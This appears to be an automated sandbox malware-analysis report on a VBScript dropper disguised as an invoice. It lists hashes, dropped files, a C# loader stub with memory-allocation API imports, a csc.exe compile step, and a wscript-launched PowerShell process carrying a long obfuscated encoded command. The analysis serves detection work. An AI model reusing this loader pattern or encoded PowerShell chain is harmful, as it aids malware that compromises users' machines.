      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBxYak7YnqqqxNPN5Dlq5J:+RI+ycuZhNb6akSqLPNnqX
      MD5:345F5C65922506673A34037D153A7DA4
      SHA1:7AB5F7D82265424CAEDF5A4A7BAC99D00B6FDA38
      SHA-256:C728C7B4C4B4C02444860EF38AA7DBDEC755C6D2BAC10CA2B60F4E4029A628E8
      SHA-512:D84EA6D7D410392CA16FE2676A96B06192AB75CC7C3553E6734E769E67E6523D6D2EB7FFEC84CC82647E63ABBC109FB15CE8124DB190DD13E07F3562E987F1C5
      Malicious:false
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.m.k.1.n.q.g.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.m.k.1.n.q.g.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

      C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.0.cs

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):882
      Entropy (8bit):5.226399550729973
      Encrypted:false
      SSDEEP:24:Jo1SGv76URmgkr7nv76zLu+yNp2vHNKgs2qz6LgdaD:Jo1SGz6emhr7nz6zjyqVFUu
      MD5:EA505B82FAD07E00D99FD3C7A36FF79A
      SHA1:68B8F59916AFB004F83158D741B1C75E02F2E83B
      SHA-256:AC0F5F6D3627B4F5F33695E43875609817401A6BF61B88B7193600FCC07AD50A
      SHA-512:BF5CA9FF4B2B5F95A04901F20869E1AB2119A0A569CFF032E8048260A11FE7E87DCB9112A2E20632A830D95353D2CB810DC1571B0091D828FFFBB61DBDE6F0DD
      Malicious:false
      Preview:.using System;..using System.Runtime.InteropServices;..public static class chondroga1..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string Ructiou,uint Muskily7,int Debi7,int chondroga0,int Farmak,int Quinqueve,int SLGT);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string Ructiou,uint Muskily7,int Debi7,int chondroga0,int Farmak,int Quinqueve,int SLGT);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int chondroga6,ref Int32 Clathra4,int Varedekla,ref Int32 chondroga,int Outhowling5,int chondroga7);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Varedekla0,uint Varedekla1,IntPtr Varedekla2,ref Int32 Varedekla3,int Varedekla4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Varedekla5,int Varedekla6);....}

      C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdline

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
      Category:dropped
      Size (bytes):369
      Entropy (8bit):5.257235356734923
      Encrypted:false
      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fTT3H0zxs7+AEszIwkn23fTTDFH:p37Lvkmb6KRfL4WZEifLPFH
      MD5:CF8F3B8A426D47F4EBA71947E3CC3904
      SHA1:08FA86AB97DC7A7432C203B73D2817E266540108
      SHA-256:7F74A53C1BB6DD79654B06C9332F2B1C1015704AF74127C2CE8BCC3FA9A2139E
      SHA-512:8D3B3A3919FC8E02CE1E38CA4C271F1DED80E435F24368AFDDEB4B5E5A74B2AF0A4E63BB453DDFC35C688C13F3E68A8E0AB9AA6135017938A159170D73303A97
      Malicious:false
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.0.cs"

      C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.dll

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):3.273098787476541
      Encrypted:false
      SSDEEP:48:6CPW4BCJTLrL9CzjGOK4j5SuJw398O1ulGa3Sq:nW3J/H9fCSViYK
      MD5:1058A8205AC63E740D8DCB2C632B3310
      SHA1:6E2D1A45BD2621E63D954ED1BF2E257EDC921CCF
      SHA-256:60BD4F36DE269F0677599366AF5B4A74A063BB6A15889A71D41787CA5E55648D
      SHA-512:5BE94D261417F861A0895C15196B9B2E799A778003C722A3177FB460902BD8C54CCECEC015ADE270312F9071553360B96E2F60B5432DF5F90192D5DDBA88520C
      Malicious:false
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Uzb...........!.................%... ...@....... ....................................@.................................l%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~..l...(...#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................2.+.................|.....|.......................................... 9............ D............ I............ a.!.......... f.+.......r.....z................................ ..r.....z...............................

      C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.out

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
      Category:modified
      Size (bytes):867
      Entropy (8bit):5.322818868845021
      Encrypted:false
      SSDEEP:24:KJBqd3ka6KRfLJEifLP4KaM5DqBVKVrdFAMBJTH:Cika6CLJEuLQKxDcVKdBJj
      MD5:3A2D7F6891BF83D9E3C331E3989D5203
      SHA1:45F3F9385D677B2B557FF75006156368CBCE87DD
      SHA-256:C0B0DC29080260EE261192AD094675D1448619BD81A23C44877247DB46826682
      SHA-512:264BFD73DD759D0539D49FED709349F4AFF0DCB511BC9857E6F8A2A5215AD24EB14571B34ED57DE5A09D64F7DAFC3A4A2CE1BD0C19631C13CD0DE174138EE5C9
      Malicious:false
      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

      Static File Info

      General

      File type:ASCII text, with very long lines, with CRLF line terminators
      Entropy (8bit):4.783519118829289
      TrID:
      • Visual Basic Script (13500/0) 100.00%
      File name:WWVN_INVOICE_8363567453.vbs
      File size:233243
      MD5:9f8e253fd51c33a2f874942ebc0d3795
      SHA1:6868a9005489e56542cf0df063985132fef50f3d
      SHA256:c33e4e9bf305cec123840dd87aa84c6d71e68ac82ea039418e1b8be3ed791b37
      SHA512:eb61932008b275fde416e7e9df71b0efaec9feeb1a33af8b98d6c582fad3a9bc91cfd4450589d3fb0a7cb6601d967c8ffa5f6d023cbbf167f2eb1ac35b054b8c
      SSDEEP:3072:pzLcTyRQ+PUQSsYwqV0SuKiSMq+fxS9XZgrrfIhAvL18lALuDYx7Pu2nNQ:pzPRQ+Qp3ZCtG2+
      TLSH:C434FBC0521D19EA8298D58CBCD432AA0F5798DDFA07F96E93A05F6F1390023BD8DD5B
      File Content Preview:'IRIDI LLAN bedgownd Misdem rvful Huntsville chor LANDSFO Aftere Klito4 Agterin LEON stavep TROER corrective ADIPS form ..'Salonrifel9 till monorimeek Ungef7 unikae FJERNKONT NYTAARSTAL Monoxylone telfonm EVECKMI pligtigts GRIDDLEB flgeska KILLBUCK Fascio

      File Icon

      Icon Hash:e8d69ece869a9ec4

      Network Behavior

      No network behavior found

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Target ID:0
      Start time:14:03:15
      Start date:10/05/2022
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
      Imagebase:0x7ff7fcbf0000
      File size:163840 bytes
      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:16
      Start time:14:04:49
      Start date:10/05/2022
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgBkAGUAcgBmAGkAYQB1ACAAVABhAGwAbAB3AG8AbwA1ACAAdgBpAG4AbwBsAG8AZwBpAHMAdAAgAEwATwBZAEEATABFACAAVgBhAGwAZQByAGkANAAgAGwAYQB2AGkAbgAgAEIAYQBhAHIAOQAgAGYAbwByAHYAZQBuAHQAZQBsACAATgBvAG4AYwBvAG4AdgAgAA0ACgAjAFAARQBSAFMATwBOAE4AQQBWACAAaQBkAGUAbQBwACAAcwB0AGEAcgB0ACAAYwBoAG8AeQBhAGkAbgB0AGkAIABsAG8AeABpAGMAdAAgAEgAZQBzAHQAZQBiAHIAZQAxACAARgBvAGUAbABlAGIAYQBsACAATQBvAGkAcwAgAEwAYQBsAGwAZQB0ACAATwBiAGUAbABpAHMAawAzACAAZAByAGkAawBrACAATABhAG4AYQBzAHIAIAANAAoAIwBiAGUAcwB0AHIAYQBhAGwAaQBuACAAUwBUAFIATQBQAEUASAAgAFYARQBEAEwAIABNAHkAZQBsAG8AIABEAGkAcwBoACAAQQBjAGMAZQBwAHQAMQAgAFUAbgBwAGwAMwAgAEEAUgBCAEUASgBEAFMATABTAEgAIABBAG4AbQBlAGwAZABlAGwAcwBlACAAUwBLAE8AVgBIAFkAVABUAEUAIABwAHIAcwB0AGUAcwBrAGEAYgAgAFAAdQBiAGwAaQBjAGkAcwA4ACAAVQBtAGkAbgBkAGUAbAA0ACAADQAKACMAcwBwAG8AcgB0AHMAbQBhACAARABrAG4AaQBuAGcAcwBzADQAIABEAGUAcABvAHMAaQAxACAAcgBlAGcAbgBpAG4AZwBzAGYAdQAgAHMAdQBzAHAAZQAgAEQAZQBiAGEAIAByAGUAcQB1AGkAcgAgAFMAYQBsAHQAcwB0AGUAbgBtADEAIABSAEQARQBQAEEATgBHAEkAIAANAAoAIwBTAGUAbAB2AG0AbwBkAHMAaQBnACAAUwBVAEIARAAgAGsAdgBrAHMAZgBpAG4AZwBlACAAQQBuAG8AbQAgAHQAaABhAGkAbABuAGQAZQAgAE8AbgBkAHUAIABuAG8AbgBwACAAVwBJAE4ARABCACAAYQB0AG8AbQB2AGEAYQBiAG4AZQAgAEMAaABpAGUAIABzAHUAYgBjAGgAbwByAG8AaQAgAFMAVABVAFAASABFAEYATwBLACAASQBtAGIAcgB1AGUAbQAgAEUAcgBuAHIAaQBuAGcAcwBmAHkAIABEAHIAbwBvAHAAcwBiADEAIABwAHIAYQBpAHMAZQBmAHUAbABuACAASQBOAEcARQBOACAATwB2AGUAcgAgAEgAbwBkAHMAIABPAHYAZQByAGgAYQB1AGwAZQA4ACAAdwBvAG8AZABzACAAdQByAGUAdABoAHIAbwAgAEwAbwBrAGEAbABrACAADQAKACMAUgBVAE4ARwBMAEUAUwBTAEsAIABWAGUAcgBkACAAYwB5AGMAbABvAGQAIABhAGYAZABrAG4AaQBuAGcAIABiAHUAcwBsACAAQQB0AHQAdQBuAGkAbgBnACAAUwBhAG4AaQB0AGkAcwBpACAAUABoAG8AdABvAHMAIABCAG8AcgBlAHAAbABhAHQAZgAgAE0AYQBqAG8AcgAgAEoAVQBNAEIATABFACAAVwBIAEUARQBMAEkATgAgAEwAZQBlAHAAaQB0AGQAcgA2ACAAVQBOAFUAUwBFAEQAIABNAEEARwBOACAAQQBnAHIAYQBmADEAIABBAG0AYgBlAHIAbgA0ACAAQQBuAGQAZQBuAGsAbABhADgAIABKAGEAZwBnAGUAZABuACAAcwBvAGwAaQBkAGEAdABpAG4AZwAgAEEAbgBnAGkAdgBlACAAQgBSAEUAVgBWACAATQBJAFMAVABBAE4ASwBFAFIAIAANAAoAIwBQAGEAbABlAGkAYwBoAHQAaAB5ADYAIABDAGwAbwB3AG4AZQByAGkAIAB0AHIAaQB2AHMAZQBsAHMAcAAgAFAAYQBtAGUANgAgAFQAaQBnAGgAdAB3AGkAIABVAG4AdwBpAGwAOAAgAFAAZQByAGkANAAgAFAAcgBvAGQAdQBrACAARABhAGcAYwBlAG4AdAByACAARwBSAEEATgBVAEwAQQAgAFMAagB1AHMAcwBlAG4AcwByAG8ANQAgAEkAUwBDAEgASQBBAEMAQgBFACAATABlAGUAZgA3ACAADQAKACMAVAByAGUAbQBvAHUAcgBpAG4AdAA1ACAAUwBKAFUAUwBLAEUATQBBAEwAIABEAGoAZQBsAGwAIABNAGkAbABpAHQAcgBsADkAIABHAGwAbwBzAHMAYQBuACAAUgBFAFYASQBFAFcAUwBEACAAUgBFAEUATABQAEUARABBAE4AVAAgAEgAdQBzAGgAbwBsAGQAZQAgAEEATABJAEUATgBBACAARABvAGIAYgBlAGwAdABmAHUAbgAgAFQAZQBhAHQAIABIAGkAbgBkAGUAcgBlACAAUwBrAHkAZAA3ACAAbQB5AGcAZwBlAHMAIABMAHkAbgBsAGEAYQBzAGgAIABQAGEAYQB0AHIAIABGAGEAYgByAGkAawBzADkAIAANAAoAIwBQAEEAQQBUAEUARwBOAEUAUgAgAEQAZQB0AGEAbABqAGUAcgBlAHIAIAB0AGkAZwBnAGUAcgBzAGsAZQAgAEYAaQBsAGUAcwAgAHIAZQB0AHMAbwBwAGcAcgAgAFAATABVAFIAIABKAHUAZwBlAG4AZABtAG4AcwB0ACAAVQBkAGIAdQA1ACAASABlAGEAdgB5AGgAIABtAGkAbABpACAAbQBlAGwAbwBkACAAYQBmAGwAYQBkAG4AaQBuACAADQAKACMAYQBmAHQAdgAgAGEAYQBuAGQAZQB2AGUAIABiAHIAbwBkAHkAYQBnAGEAcwAgAHQAZQBsAGUAbwBjAGUAcgBhAHMAIABPAEMAVABBAFYATwBLACAAWgBhAHIAegB1ADMAIABJAE4ARABTACAAVABXAEkAUwBDACAAUwBLAE8AVgBTAEwATwAgAFQAbwB3AG4AbABhAG4AZABsAHkAIAANAAoAIwBQAFIASQBTACAARwByAHUAcwB2AGUAagBlADkAIABVAG4AbQBhAHIAYgBsAGUAaQB6ACAAQQBMAEsATwBIAE8ATAAgAEQARQBWAEkAQQBUAEkATwBOACAASABvAG0AYQB0AG8AIABDAHIAZQBhAHQAaQAgAFMAdABvAGIAcwBiADcAIABhAG4AZgBsAGoAZQBuACAARgBvAHIAZQB0AGEAZwBlAG4AIABQAHIAbwB0ACAAVQBQAEwARQBBAFAARQBEACAAZABpAG0AcABsAGUAbQBlACAAZwBlAHIAdABoAGEAcwBoAGEAIABTAFQATwBSAEsARQBOAEIAQgAgAA0ACgAjAEEAcwBzAHUAcgBhAGIAbAAgAE0AZQB0AGEAZgBvAHIAZQByAG4AIABJAEgAVQBLAE8ATQBQACAAWAB5AGwAbwBjADgAIABTAHQAYQBuAGQAYQByACAASABhAG4AZABsAGkAbgBnAHMAbAAgAFAAZQB3AGYAdQBsAGIAbABvADIAIABNAGkAcwB0AG4AMwAgAE8AWQBTAFQARQBSACAARABlAHQAYQBpAGwAcAByACAAcgBlAGYAbwByACAAUgBJAEcAUwBSAEUAVgBJACAAYwBsAG8AZgBpAGIAIABLAE4ASQBDACAAQgByAG4AZQBsAG8AawBrACAARABlAG0AbwBuAHQAZQByADgAIAB0AGEAcgB2ACAAcwBsAGcAZQByAHMAdAAgAFUATgBEAEUAUgAgAA0ACgAjAFMAYQBuAHMAZQB2AGUAOQAgAEkAcgByAGUAcwBwACAAQgBJAFIAQwBIAEUAIABNAGUAZwBhACAARABhAGcAbABuAHMAcwBhADIAIABLAFkAUwBUACAAUwB0AG8AbQBhAHQAbwBsAG8AIABBAHQAdAB5ACAAcgB1AHQAaQBuAGUAcwBzACAAcABpAGMAYQBtAGEAcgAgAGwAYQBjAGMAaQBjAGgAZQAgAEIAWQBHAEcARQBNAFkATgAgAGcAcgBpAG0AYQBzACAAaQBuAHQAcgB1ACAAbQBhAHIAcQAgAGoAYQByAGQAbwBuAG4AIABjAGgAbwBsAG8AcwAgAE0ATwBSAEIASQAgAFMAQQBWAEEARwBFAFMAUwAgAFIASQBEAEUASABFAFMAVABFAFMAIABTAHQAZQBtAG0AZQByAGUAdABzADUAIAByAGUAdgBpACAAQgBhAHMAdABpAGwAbAA4ACAAQgBlAGQAYQAgAFMAQwBVAFIAUgBJAEUAIABVAE0ARQBEAEcAUgAgAEsAeQBsAGkAbgAgAHUAbgBmAGkAIABzAGwAaQBwACAAUABSAEUASABFAE4AUwAgAA0ACgAjAEEAbgBkAGUAbgBrAGwAYQBzAHMAIABkAGUAbQBhACAAUwBDAEkATABMAEEARQBSACAAYgBsAHIAZQBoAGEAIABSAG8AbgBpAG4AZwA4ACAAQwBVAEUATQBBAE4AUwBIAEkAIABLAGEAcwBlAHIAbgAgAFIAdQBmAGcAYQByAGQAaQBuACAAcAByAGEAbgBnAGUAbgAgAFUAUwBQAEUAQwBJAEYASQAgAFMAdQBiAGwAaQBtACAASwBFAFIATgBFAE8AUAAgAEEAcgBpAGQAIABiAHIAbgBlAGYAZAAgAA0ACgAjAEsAYQBmAGYAZQBnACAAQgBvAG8AbgBkAG8AZwBnAGwAZQAgAE4AbwBzAHQAIABSAGkAZgBsAGUAdAB0AG8AcgA3ACAAUwBVAFIARwBFAEwARQBTAFMAIABJAGQAcgB0AHMAaABqAHMAawAyACAAcgBlAHMAZQByAHYAYQB0AGkAbwAgAGsAaQBzAHMAZQAgAGcAYQB5AGwAdQBzAHMAaQB0ACAAYQB0AG8AbQBhAGYAZgBhAGwAZAAgAFIAQQBHAEUATwBVAFMAIABCAHUAdABpAGsAcwBkAHIAaQAgAG8AcABkAGEAdABlACAASABvAHIAbgBiAHIAaQA0ACAAQwBvAG4AcwBhAG4ANwAgAE0ATABLAEUASwAgAEkAbwBkAGkAZABwAGgAaQBsADYAIABJAGQAZQBhAGwAaQBzAG0AZQA0ACAARgBsAGEAZwBlACAASQBuAHYAbwBsAHYAZQByAHMANAAgAHUAbABuAGEAYQBuAGkAIABSAGsAZQBuAHUAbgAgAGwAaQBtAGUAbABpACAAYQBhAHIAcgBpACAAbQBhAGQAZABvAHgAdQBkAHYAIABIAGUAbABoAGUAcwB0AGUAbgBhACAAUABvAHMAdAB1AGwAZQByADEAIABCAGUAegBlAGwAcwBjACAAQgBsAGkAbgAgAA0ACgAjAEMAYQBzAHQAZQByADYAIAB2AGEAbgBkACAAYwBoAGEAZQBuAG8AIABTAHEAdQBhAHQAdAA1ACAASABJAEcASABMACAAQwBvAG4AYwBoAGEAZQAgAFAAYQByAHQAIABEAEUASwBMACAAcwB1AGIAcwBpAGQAZQAgAHUAbgBkAGUAIABmAGEAdQBuAGUAcgBhACAAcwBwAHIAZQBhACAAUABBAEMASQBGAEkAQwBBACAARgBKAEUATgBEAFQATABJACAAYwBlAHAAaABhAGwAbwB0AGgAbwAgAFMARQBSAFIAQQBUAEkATwAgAFMAZQByAGIAaQBzAGsAZQBsADgAIAANAAoAIwBGAEwATABFAFMAQQBOACAAQQByAGEAZwBvAHIAbgB1AG4AYQAgAGUAbgBzAHIAZQB0AHQAZQBkAGUAIABNAHkAZQBsACAAcwB1AHAAZQByAHMAZQB4AGUAIABBAGcAZwByAGEAdgBlAHIAZQAgAHQAaQBtAGUAbABvAGYAIABzAGkAbQBlAG8AbgBiAGUAdgBpACAAUABSAEUATwBQAEUATgBJAE4AIABzAG0AZQBsAHQAZQAgAGoAZQBsAGwAeQBmAGkAcwBoAGEAIABHAGUAcgByAGEAIABQAG8AaQB0AHIAYQBpAGwAbwAgAA0ACgAjAFgAZQBuAG8AZwBsAG8AcwAgAE8AdQB0AG4AIAByAGUAdgBpAHMAbwByAGYAIABWAEEAQQBCAEUATgBGAEEAIABSAHUAbQBzAGsAaQBiAGUAcgAxACAAQQB0AHQAZQBzAHQAZQA5ACAASABhAGEAbgBkAGgAdgBlAGwAcwA4ACAARABJAFAATABPAE0AIABTAEkATABFAE4AQQBMACAATwBhAGsAeQBzAGwAagBkADQAIABMAGEAdABlAG4AcwAgAG0AZgBnAGcAcgB1AG4AIABrAGEAcgB0AG8AdABlAGsAcwBvACAADQAKACMAZQBzAHQAbwAgAFQAYQBsAG0AIABUAHUAYQByAGUAZwAyACAAQgBsAG8AawBmAHUAbgBrAHQAaQAxACAARgBvAHIAbABhACAAVAByAGEAbgAxACAAQQByAGIAZQBqAGQAIABOAG8AbgBjAG8AIABzAGkAZwB0AGUAbQBlAGwAcwBvACAARwBhAGwAdgBhAG4AaQAgAEYAbwBkAGUAcgBmAGEAIABSAGUAcwBlAGMAdAA1ACAADQAKACMARQB0AGEAcABlAGwAYgBlAHQAIABCAGEAYwBrAGYAaQBzAGMAOAAgAE0AWQBMAEQAUgBFACAATQBhAGwAYwA4ACAAZwBhAG0AbQBpAGMAawB1ACAARQBnAG0AdQBuAHQAdgBhACAASABLAEEAUwAgAFUAbgBpAHIAbwBuAGkAYwA1ACAAVABpAGwAYgBhAGcAZQBzAGsAIABGAEkAUgBFAE8ARwBUAFkAVgAgAFMAdABlAGEAZABpAGUAcwB0ACAAUgBnAHQAZQBuAGQAZQBzADQAIABTAGsAdgBhAGQAcgBvAG4AZQAgAEIAcgBlAGkAcwBsAGEAawBpACAADQAKACMAVgBJAFIASwBTAE8ATQBIACAARwB1AGUAcgA4ACAATQBBAE4AQwBIAEUAIABBAGMAYwBvAG0AbQBvAGQAYQB0ACAAUwBlAG0AaQB2AGUAcgB0AGkANwAgAE4AQQBJAFYAIABMAG8AZwBvAGcAIABTAFAASQBEAFMARwAgAGcAawBhAG4AdABsACAAdAB1AGcAcgBpAGsAcwBwAHIAIABjAGgAYQBtACAAUwB5AHMAdABlAG0AYgBlADUAIABCAFIATwBOAFoARQBGACAADQAKACMAUgB1AG0AcABsAGUAbABhAHMAIABEAEEATgBTAEUATQBVAFMARQAgAE0ARQBTAE8AUgBSAEgAIABVAE4ARABJAFMAQwBPAFYARQAgAFQAaQBkAHQAYQBnAGUAcgBlAHIAIABUAHkAcABvAHMAcwB0AG8ANwAgAEIAUgBPAEsAQQBEAEUAUgBTAFIAIABNAHkAbwBzAG8AdAAgAHIAaQBkAGkAYwB1AGwAbwB1ACAAQgB1AGcAdAAgAHMAbABhAG4AdABlACAAagBvAGwAbABpAGUAZABhAG4AdAAgAE8ATQBEAEkAUgBJAEcARQBSACAARABlAHQAcgBvAG4AaQBzACAARgBhAGQAZAAzACAARAByAGkAawBrACAASwBSAEEARwBFAEYAVQBHACAAUABTAEUAVQBEAE8AQQBNAEEAIABTAFkARABEACAAVQBOAEQARQBUAFIASQBNAEUAIAB0AGEAbQBs